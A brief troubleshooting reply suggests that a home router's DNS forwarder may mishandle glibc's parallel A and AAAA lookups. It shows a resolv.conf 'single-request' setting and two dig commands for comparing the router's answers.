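    One thing worth testing (a hedged guess, not a confirmed diagnosis): glibc's stub resolver sends the A and AAAA queries in parallel from a single source port, and some home-router DNS forwarders mishandle that, while ping's simpler lookup pattern doesn't trigger it. resolv.conf has a switch to serialize the two lookups, and dig can show how the modem answers each query type:

        # /etc/resolv.conf
        nameserver 192.168.1.254
        options single-request

        # Compare the modem's answers for the two query types
        dig A www.google.com @192.168.1.254
        dig AAAA www.google.com @192.168.1.254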
